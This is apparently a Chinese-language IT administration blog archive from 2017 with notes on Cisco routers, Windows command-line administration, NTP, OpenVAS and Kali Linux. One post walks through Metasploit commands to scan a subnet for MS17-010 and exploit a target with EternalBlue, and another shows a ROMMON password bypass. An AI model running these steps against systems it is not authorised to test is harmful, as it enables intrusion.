Year記事本: 2017

2017年12月18日星期一

Cisco Router 登入帳號密碼建立

建立帳號密碼
Router(config)#username ciscoadmin password kali224466

提升最高權限
Router(config)#username ciscoadmin privilege 15

設定進入Console密碼
Router(config)#line console 0
Router(config-line)#password kali224466
Router(config-line)#login

設定進入Telnet密碼
Router(config)#line vty 0 15
Router(config-line)#password kali224466
Router(config-line)#login

設定enable的密碼
Router(config)#enable password kali224466

設定enable的密碼以加密方式儲存(登入時優先輸入)
Router(config)#enable secret kali22446688

以上密碼(除enable secret)使用show run就可以看到密碼，可以使用service password-encryption針對密碼進行加密
Router(config)#service password-encryption

使用本地帳號驗證
Router(config)#line console 0
Router(config-line)#password kali224466
Router(config-line)#login local

2017年10月30日星期一

Kali Linux - Metasploit 使用方法

1.更新metasploit版本
apt-get update
apt-get install metasploit-framework

2.開啟Metasploit
msfconsole

3.常用指令說明
help：檢視執行指令的資訊
search module：搜尋特定模組
use module：載入特定模組
info：查訊目前使用模組的資訊
options：查看需要設定的參數
set option module：設定模組內的參數
check：測試
run：執行滲透攻擊模組
back：回到上層

範例 - 攻擊Microsoft的MS17_010漏洞

search ms17_010

a.大範圍搜索攻擊目標
use auxiliary/scanner/smb/smb_ms17_010
options
set RHOSTS 192.168.33.1/24
set THREADS 16
run

b.攻擊特定目標
use exploit/windows/smb/ms17_010_eternalblue
options
set RHOST 192.168.33.106
RUN

c.滲透成功
ipconfig
whoami

2017年10月26日星期四

Word、Excel、PowerPoint無法插入物件(CAD圖檔 .dwg)、或開啟物件(CAD圖檔 .dwg)會出現錯誤訊息

問題描述：
1.Word、Excel、PowerPoint插入物件DWG圖檔，出現「無法插入物件」。
2.開啟Word、Excel、PowerPoint內DWG圖檔，出現「無法啟動此內嵌物件的來源應用程式」。

解決方法：
1.查詢AutoCAD版本的CLSID
執行「regedit」開啟登錄編輯程式，展開HKEY_CLASSES_ROOT\AutoCAD.Drawing.[格式編號]\CLSID，查詢AutoCAD的CLSID。
ex:
HKEY_CLASSES_ROOT\AutoCAD.Drawing.20\CLSID =>AutoCAD 2016
HKEY_CLASSES_ROOT\AutoCAD.Drawing.21\CLSID =>AutoCAD 2017

目前已知的AutoCAD版本CLSID碼如下
R14：{5E4405B0-5374-11CE-8E71-0020AF04B1D7}
2000/2001/2002：{4D3263E4-CAB7-11D2-802A-0080C703929C}
2004/2005/2006：{8E75D913-3D21-11D2-85C4-080009A0C626}
2007/2008/2009：{7AABBB95-79BE-4C0F-8024-EB6AF271231C}
2010/2011/2012：{D70E31AD-2614-49F2-B0FC-ACA781D81F3E}
2013/2014/2015：{6A221957-2D85-42A7-8E19-BE33950D1DEB}
2016：{149DD748-EA85-45A6-93C5-AC50D0260C98}
2017：{720DB9AF-D62C-4ED0-A377-429C22312852}

2.複製底下米字內的內容，貼上至記事本，根據您使用的CAD版本，更改@後面的CLSID值(以下是使用AutoCAD 2016)，儲存為reg檔後執行。

******************************************************************************
Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\CLSID\{5E4405B0-5374-11CE-8E71-0020AF04B1D7}\AutoConvertTo]
@="{149DD748-EA85-45A6-93C5-AC50D0260C98}"

[HKEY_CLASSES_ROOT\CLSID\{4D3263E4-CAB7-11D2-802A-0080C703929C}\AutoConvertTo]
@="{149DD748-EA85-45A6-93C5-AC50D0260C98}"

[HKEY_CLASSES_ROOT\CLSID\{8E75D913-3D21-11d2-85C4-080009A0C626}\AutoConvertTo]
@="{149DD748-EA85-45A6-93C5-AC50D0260C98}"

2017年10月11日星期三

Cisco Router 重開機會進入rommon模式

請檢查映像檔是否還在及組態暫存器值，也可試著設定boot system

1.檢查falsh0內的IOS 映像檔是否還在
Cisco_Router#dir flash:
Directory of flash0:/

1 -rw- 76900964 Sep 2 2015 14:11:48 +00:00 c1900-universalk9-mz.SPA.155-1.T1.bin
2 -rw- 3066 Sep 2 2015 14:20:34 +00:00 cpconfig-19xx.cfg
3 -rw- 720 Dec 29 2015 11:29:16 +00:00 vlan.dat
4 drw- 0 Sep 2 2015 14:20:56 +00:00 ccpexp
459 -rw- 2885 Sep 2 2015 14:24:46 +00:00 home.shtml

2.檢查當前的組態暫存器值是否為0x2102
Cisco_Router#show version

Configuration register is 0x2102

如果不是0x2102，更改指令如下
Cisco_Router#conf t
Cisco_Router(config)#config-register 0x2102
[Ctrl-Z]
Cisco_Router#reload

3.設定boot system
Cisco_Router#dir flash:
Directory of flash0:/

1 -rw- 76900964 Sep 2 2015 14:11:48 +00:00 c1900-universalk9-mz.SPA.155-1.T1.bin
2 -rw- 3066 Sep 2 2015 14:20:34 +00:00 cpconfig-19xx.cfg
3 -rw- 720 Dec 29 2015 11:29:16 +00:00 vlan.dat
4 drw- 0 Sep 2 2015 14:20:56 +00:00 ccpexp
459 -rw- 2885 Sep 2 2015 14:24:46 +00:00 home.shtml

設定前，無boot system資料
Cisco_Router#show run | inc boot
boot-start-marker
boot-end-marker

Cisco_Router#conf t
Cisco_Router(config)#boot system flash0:c1900-universalk9-mz.SPA.155-1.T1.bin
[Ctrl-Z]
Cisco_Router#write

設定後
Cisco_Router#show run | inc boot
boot-start-marker
boot system flash0:c1900-universalk9-mz.SPA.155-1.T1.bin
boot-end-marker

2017年9月29日星期五

Kali Linux 設定IP

1.修改 /etc/network/interfaces 內容
root@kali~#nano /etc/network/interfaces

2.設定使用模式

★DHCP(自動取得IP)
auto eth0
iface eth0 inet dhcp

★Static IP(固定IP)
auto eth0
iface eth0 inet static
address 192.168.1.100 # IP位址
netmask 255.255.255.0 # 子網路遮罩
gateway 192.168.1.254 # 預設閘道

3.重新啟動網路或重開機
root@kali~#sudo /etc/init.d/networking restart #重啟網路
root@kali~#ifdown eth0 && ifup eth0 #重啟網路介面卡
root@kali~#reboot #重新開機

2017年9月20日星期三

使用cmd指令刪除n天前的檔案(forfiles)

FORFILES [/P pathname] [/M searchmask] [/S] [/C command] [/D [+ | -] {yyyy/MM/dd | dd}]

/P pathname 表示要開始搜尋的路徑。
預設資料夾是目前的
目錄 (.)。

/M searchmask 根據 searchmask 搜尋檔案。
預設的 searchmask 是 '*'。

/S 指示 forfiles 遞迴搜尋
子目錄。例如 "DIR /S"。

/C command 表示每個檔案要執行的命令。
命令字串應該包含在雙括號
之間。
預設的命令是 "cmd /c echo @file"。

/D date 選取檔案上次修改的時間大於或
等於 (+) 、小於或等於 (-)，
使用 "yyyy/MM/dd" 格式指定的日期;
或選取檔案上次修改
的時間大於或等於 (+)
目前的日期再加上 "dd" 天、
小於或等於 (-) 目前的日期減去 "dd" 天。
有效的 "dd" 可以是介於
0 - 32768 之間的數字。
如果未指定，"+" 將被視為預設符號。

範例如下

刪除放在D:\LOG目錄內10天以前的記事本檔案
forfiles /P "D:\LOG" /S /M *.txt /D -10 /C "cmd /c del @path"

列出並刪除放在D:\LOG目錄內10天以前的記事本檔案
forfiles /P "D:\LOG" /S /M *.txt /D -10 /C "cmd /c echo delete @path && del @path"

列出放在D:目錄內所有的批次檔
forfiles /P "D:" /S /M *.bat /C "cmd /c echo @path"

複製D:\WORK目錄內10天以前的檔案到E:\Archive
forfiles /P "D:\WORK" /S /D -10 /C "cmd /c copy @path E:\Archive"

列出並複製D:\WORK目錄內10天以前的檔案到E:\Archive
forfiles /P "D:\WORK" /S /D -10 /C "cmd /c echo copy @path && copy @path E:\Archive"

搬移D:\WORK目錄內10天以前的檔案到E:\Archive
forfiles /P "D:\WORK" /S /D -10 /C "cmd /c move @path E:\Archive"

列出並搬移D:\WORK目錄內10天以前的檔案到E:\Archive
forfiles /P "D:\WORK" /S /D -10 /C "cmd /c echo move @path && move @path E:\Archive"

2017年9月19日星期二

使用cmd指令新增或刪除TCP/IP印表機、驅動、連接埠

1.用指令刪除印表機、驅動、連接埠

rem ***刪除印表機***
rem -p 印表機名稱
cscript C:\Windows\System32\Printing_Admin_Scripts\zh-TW\prnmngr.vbs -d -p "FX ApeosPort-IV C4470 PCL 6"

rem ***刪除印表機驅動程式***
rem /m 印表機驅動程式型號名稱
rundll32 printui.dll,PrintUIEntry /dd /m "FX ApeosPort-IV C4470 PCL 6"

rem ***刪除連接埠***
rem -r 連接埠名稱
rem -h 裝置的 IP 位址
cscript C:\Windows\System32\Printing_Admin_Scripts\zh-TW\prnport.vbs -d -r IP_192.168.1.5 -o raw -n 9100 -h 192.168.1.5

2.用指令新增印表機、驅動、連接埠

rem ***建立連接埠***
rem -r 連接埠名稱
rem -h 裝置的 IP 位址
cscript C:\Windows\system32\Printing_Admin_Scripts\zh-TW\prnport.vbs -a -r IP_192.168.1.5 -o raw -n 9100 -h 192.168.1.5

rem ***安裝印表機及驅動***
rem /b 印表機名稱,可隨意取名
rem /f inf檔案路徑
rem /r 連接埠名稱
rem /m 印表機驅動程式型號名稱
rundll32 printui.dll,PrintUIEntry /if /b "FX ApeosPort-IV C4470 PCL 6" /f "\\192.168.1.1\fxap4c4470\FX6KYAL.INF" /r "IP_192.168.1.5" /m "FX ApeosPort-IV C4470 PCL 6"

rem ***設定預設印表機***
rem /n 印表機名稱
rundll32 printui.dll,PrintUIEntry /y /n "FX ApeosPort-IV C4470 PCL 6"

2017年8月30日星期三

使用cmd指令新增、刪除使用者帳號與群組

1. 新增、修改、刪除使用者
建立使用者帳戶，帳號User1 密碼123456
net user user1 123456 /add

修改使用者帳號密碼，帳號User1 密碼改為12345678
net user user1 12345678

刪除使用者帳號User1
net user user1 /del

2. 新增、刪除群組
新增一個 Groups1 群組
net localgroup groups1 /add

刪除 Groups1 群組
net localgroup groups1 /del

3. 新增使用者帳號到指定群組
使用者帳號User1加入至Groups1群組
net localgroup groups1 user1 /add

網域帳號contoso\jack加入至本機Groups1群組
net localgroup groups1 contoso\jack /add

刪除Groups1群組中的使用者帳號User1
net localgroup groups1 user1 /del

2017年8月29日星期二

Kali Linux 安裝OpenVAS

下載VirtualBox及安裝
https://www.virtualbox.org/wiki/Downloads
下載Kali Linux Image並安裝在VirtualBox內
https://www.kali.org/downloads/

1.安裝好Kali Linux後，修改鏡像源定義文件
nano /etc/apt/sources.list
清空文件内所有内容及添加
deb http://http.kali.org/kali kali-rolling main contrib non-free
CTRL+O 確認並存檔
CTRL+X 退出

2、更新
apt-get update
apt-get upgrade
apt-get dist-upgrade

3、安裝OpenVAS
apt-get install openvas #安裝OpenVAS
openvas-setup #自動設定環境、下載憑證及定義檔
openvas-check-setup #檢查安裝
openvasmd --create-user admin1 #建立帳號
openvasmd --user=admin1 --new-password=openvas #更改密碼
openvas-feed-update　#升级
openvas-stop
openvasmd --rebuild
openvas-start
netstat -tlnp #確認9390跟9392兩個port已在LISTEN狀態
https://127.0.0.1:9392 (在Kali開啟瀏覽器，輸入IP打開操作介面)

PS.每次重開機需要執行底下指令(OpenVAS的bug)
openvas-stop
openvasmd --rebuild
openvas-start

2017年8月21日星期一

Cisco Router 更新 IOS 映像檔(使用TFTP)

1.下載新IOS https://software.cisco.com/download/navigator.html?mdfid=268437899

2.電腦開啟TFTP軟體

3.連上Cisco Router ( Console or Telnet )

4.檢查當前的 Cisco IOS 映像檔
Cisco_Router#show version
Cisco_Router#dir flash:

5.上傳IOS到Router，輸入TFTP IP及新IOS檔名
Cisco_Router#copy tftp flash
Address or name of remote host []?172.16.0.100
Source filename []?c1900-universalk9-mz.SPA.155-3.M6.bin
Destination filename [c1900-universalk9-mz.SPA.155-3.M6.bin]?Enter
Accessing tftp://172.16.10.100/c1900-universalk9-mz.SPA.155-3.M6.bin...
Loading c1900-universalk9-mz.SPA.155-3.M6.bin from 172.16.10.100 (via Vlan100):
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
[OK - 79736636 bytes]

79736636 bytes copied in 151.816 secs (525219 bytes/sec)

Cisco_Router#

6.檢驗IOS是否上傳成功及檢查新IOS映像檔是否完整
Cisco_Router#dir flash:
Cisco_Router#verify flash:c1900-universalk9-mz.SPA.155-3.M6.bin

7.預設情況下，路由器的啟動序列會載入快閃記憶體中所列出的第一個 Cisco IOS 映像檔。保證路由器載入新映像檔的方法之一是設定 boot system flash 命令。
Cisco_Router(config)#boot system flash c1900-universalk9-mz.SPA.155-3.M6.bin
Cisco_Router(config)#end
Cisco_Router#copy running-config startup-config
Destination filename [startup-config]?Enter
Building configuration...
[OK]
Cisco_Router#

8.測試新映像檔
使用reload指令重啟路由器，重啟後使用show version檢查新IOS映象檔是否已位於RAM中
Cisco_Router#reload
Proceed with reload? [confirm]Enter
Cisco_Router#show version

9.刪除舊的IOS
Cisco_Router#delete flash0:/c1900-universalk9-mz.SPA.154-3.M3.bin
Delete filename [c1900-universalk9-mz.SPA.154-3.M3.bin]? Enter
Delete flash0:/c1900-universalk9-mz.SPA.154-3.M3.bin? [confirm] Enter
Cisco_Router#

2017年8月18日星期五

Active Directory Health Checks Command - AD健康檢查常用指令

repadmin /replsummary

repadmin /syncall /e

repadmin /showrepl * 　

dcdiag /c /e /v

netdom query fsmo

2017年8月14日星期一

Cisco Router設定檔備份與還原(使用TFTP)

1.下載TFTP軟體，開啟TFTP主程式，選好Server interface
http://tftpd32.jounin.net/

2.使用Console或Telnet進入Cisco介面，執行備份指令
Cisco_Router#copy startup-config tftp:
Address or name of remote host []? 172.16.0.100 //輸入TFTP Server IP位址
Destination filename [cisco_router-confg]? //備份至目的地的檔案名稱
!!
7289 bytes copied in 0.064 secs (113891 bytes/sec)

3.如需還原設定檔，可執行還原指令:
Cisco_Router#copy tftp: startup-config
Address or name of remote host []? 172.16.0.100 //輸入TFTP Server IP位址
Source filename []? cisco_router-config //備份的檔案名稱
Destination filename [startup-config]?
Accessing tftp://172.16.0.100/cisco_router-confg...
Loading cisco_router-confg from 172.16.0.100 (via vlan100): !
[OK - 7289 bytes]
[OK]
7289 bytes copied in 0.476 secs (15313 bytes/sec)

2017年8月10日星期四

Cisco Router密碼重設

Cisco路由器組態暫存器，數值預設0x2102，另一常數值0x2142，使用0x2142數值，在開機過程中會略過NVRAM中的Startup-Config，因此不須密碼即可進入路由器的特權模式

密碼重設步驟
1.電腦連接Router的Console Port，開啟PUTTY(或超級終端機)

2.開啟Router電源，接著按下鍵盤的 Ctrl + Break 中斷 Router 開機程序，進入ROM模式

3.更改組態暫存器的值(由預設的 0x2102 變更為 0x2142)

rommon 1 > confreg 0x2142

4.使用 reset 指令重新載入 IOS，重載的IOS會因0x2142 的值而忽略 NVRAM 設定檔

You must reset or power cycle for new config to take effect
rommon 2 > reset

5.使用 enable 進入特權模式。

Router> enable

6.恢復之前的Config設定，將NVRAM中Startup-Config複製到RAM的Running-Config

Router# copy startup-config running-config Destination filename [running-config]?

2122 bytes copied in 1.125 secs (1886 bytes/sec)
Router#

7.更改特權模式(enable)密碼或取消密碼

Router# conf t

Router(config)# enable secret XXXXXX 或者 no enable secret

8.密碼變更完成，復原組態暫存器之值。

Router(config)# config-register 0x2102

9.設定完密碼後，將Running-Config寫回Startup-Config

Router# copy running-config startup-config Destination filename [startup-config]?

Building configuration...

[OK]

10.重啟Router

Router# reload

2017年8月8日星期二

使用指令建立或移除Windows Service

建立Windows Service
1. 開啟Cmd
2. 輸入
sc create "服務名稱" binPath= "可執行檔所在路徑" displayname= "顯示名稱" start= auto
ex: sc create "AdobeARMservice" binPath= "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" displayname= "Adobe Acrobat Update Service" start= auto

移除Windows Service
1. 開啟Cmd
2. 輸入sc delete "服務名稱"
ex: sc delete "AdobeARMservice"

2017年7月16日星期日

Outlook-簽名檔轉移方法(適用Outlook 2007.2010.2013.2016)

假設Ａ電腦的簽名檔要移轉給Ｂ電腦使用
1.先到Ａ電腦的『C:\Users\(Username)\AppData\Roaming\Microsoft\Signatures』，複製資料夾下的檔案。

2.將複製好的檔案，貼到Ｂ電腦的資料夾『C:\Users\(Username)\AppData\Roaming\Microsoft\Signatures』底下。
　ps.如Ｂ電腦沒有Signatures資料夾，請自行建立。

3.開啟Ｂ電腦的Outlook，簽名檔會自動帶入。
　ps.預設的簽名檔(如新郵件或回覆/轉寄)需要自行選取

2017年7月11日星期二

GPO-憑證派送

開啟GPO，在Default Domain Policy上按下滑鼠右鍵選編輯，依序找到『電腦設定』\『原則』\『Windows 設定』\『安全性設定』\『公開金鑰原則』\『受信任的根憑證授權單位』，接著匯入要派送的憑證

2017年6月30日星期五

Windows NTP Server-設定內部時間伺服器與外部時間來源同步

1. 確認Windows Time服務為執行中

系統管理工具＞服務，確認Windows Time (W32Time)服務為已啟動。

2. 將伺服器類型變更為 NTP

a. 開始＞執行，輸入regedit，開啟登錄編輯程式

b. 找出下列登錄子機碼HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\Parameters

c. 在右窗格中，將 [Type]的數值資料修改為NTP，然後按下[確定]。

Type	Description
NoSync	The time service does not synchronize with other sources.
NTP	The time service synchronizes from the servers specified in the NtpServer..
NT5DS	The time service synchronizes from the domain hierarchy.
AllSync	The time service uses all the available synchronization mechanisms.
The default value on domain members is NT5DS. The default value on stand-alone clients and servers is NTP.

3. 設定這台伺服器為可信賴的時間伺服器，將 [AnnounceFlags] 設為 5。

a. 找出下列登錄子機碼HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\Config

b. 在右窗格中，將[AnnounceFlags]的數值資料修改為5，然後按下[確定]。

Type	Description
0x00	Not a time server
0x01	Always time server
0x02	Automatic time server
0x04	Always reliable time server
0x08	Automatic reliable time server
The default value for domain members is 10. The default value for stand-alone clients and servers is 10.

4. 設定這台伺服器為NTP伺服器提供者。

a. 找出下列登錄子機碼HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer

b. 在右窗格中，將[Enabled]的數值資料改為1，然後按下 [確定]。

Type	Description
1	Yes
0	No

5. 指定外部NTP伺服器

a. 找出下列登錄子機碼HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\Parameters

b. 在右窗格中，將[NtpServer]的數值資料改為time.stdtime.gov.tw,0x1 clock.stdtime.gov.tw,0x1，然後按下 [確定]。

Ps. Peers 是以空格分隔的對等裝置清單的預留位置，您的電腦會從中取得時間戳記。清單所列的每個 DNS 名稱必須都是唯一的。您必須在每個 DNS 名稱的結尾加上 ,0x1。如果沒有在每個 DNS 名稱的結尾加上 ,0x1，您在步驟 6 所做的變更將不會生效。

Type	Description
0x01	SpecialInterval
0x02	UseAsFallbackOnly
0x04	SymmetricActive
0x08	Client
There is no default value for this registry entry on domain members. The default value on stand-alone clients and servers is time.windows.com,0x1.

6. 設定時間伺服器與外部NTP伺服器輪詢間隔

a. 找出下列登錄子機碼HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient

b. 在右窗格中，將[SpecialPollInterval]的數值資料改為TimeInSeconds，然後按下 [確定]。

Ps. TimeInSeconds 是每個輪詢之間您所指定秒數的預留位置。建議值為 900 (十進位)。這個值會將 Time Server 設定為每隔 15 分鐘輪詢一次。

7. 設定時間修正設定值，也就是設定來跟這台時間伺服器詢問時間的機器，跟你的誤差時間為多少區間內是合理的，也就是說如果差距過大，可以拒絕將正確時間回報來詢問的電腦。

a. 找出下列登錄子機碼HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\Config

b. 在右窗格中，將[MaxPosPhaseCorrection] 的數值資料改為TimeInSeconds(十進位)，然後按下 [確定]。

c. 在右窗格中，將[MaxNegPhaseCorrection] 的數值資料改為TimeInSeconds(十進位)，然後按下 [確定]。

Ps. TimeInSeconds 是合理數值的預留位置，例如 1 小時 (3600) 或 30 分鐘 (1800)。您所選取的值將需依據輪詢間隔、網路狀況及外部時間來源而定。在 Windows Server 2008 R2 或更新版本中，MaxPosPhaseCorrection與MaxNegPhaseCorrection的預設值為 48 小時。

※機碼區分為起與迄，即為「Neg ← 現在時間 → Pos」。

8. 關閉登錄編輯程式

9. 因NTP服務使用UDP 123通訊埠，接著要在防火牆新增輸入規則(開啟UDP 123 Port)

10.重啟Windows Time 服務，輸入net stop w32time && net start w32time

11.檢查時間伺服器是否正常運作

w32tm /query /configuration 顯示執行階段的設定，以及設定的來源。

w32tm /query /status 顯示 Windows 時間服務狀態。

w32tm /query /source 顯示時間來源

w32tm /monitor 顯示DC之間時間狀態

w32tm /resync /rediscover 重新連接NTP伺服器

參考資料

https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/get-started/windows-time-service/windows-time-service-tools-and-settings

訂閱：文章 (Atom)

2017年12月18日 星期一

2017年10月30日 星期一

2017年10月26日 星期四

2017年10月11日 星期三

2017年9月29日 星期五

2017年9月20日 星期三

2017年9月19日 星期二

2017年8月30日 星期三

2017年8月29日 星期二

2017年8月21日 星期一

2017年8月18日 星期五

2017年8月14日 星期一

2017年8月10日 星期四

2017年8月8日 星期二

2017年7月16日 星期日

2017年7月11日 星期二

2017年6月30日 星期五